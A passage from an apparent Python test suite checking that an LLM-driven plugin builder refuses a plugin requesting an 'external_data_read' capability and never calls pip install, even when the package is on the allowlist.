            required_capabilities=["external_data_read"],
            pip_deps=["requests"],
        )
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=["requests"],
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert pip_calls == []
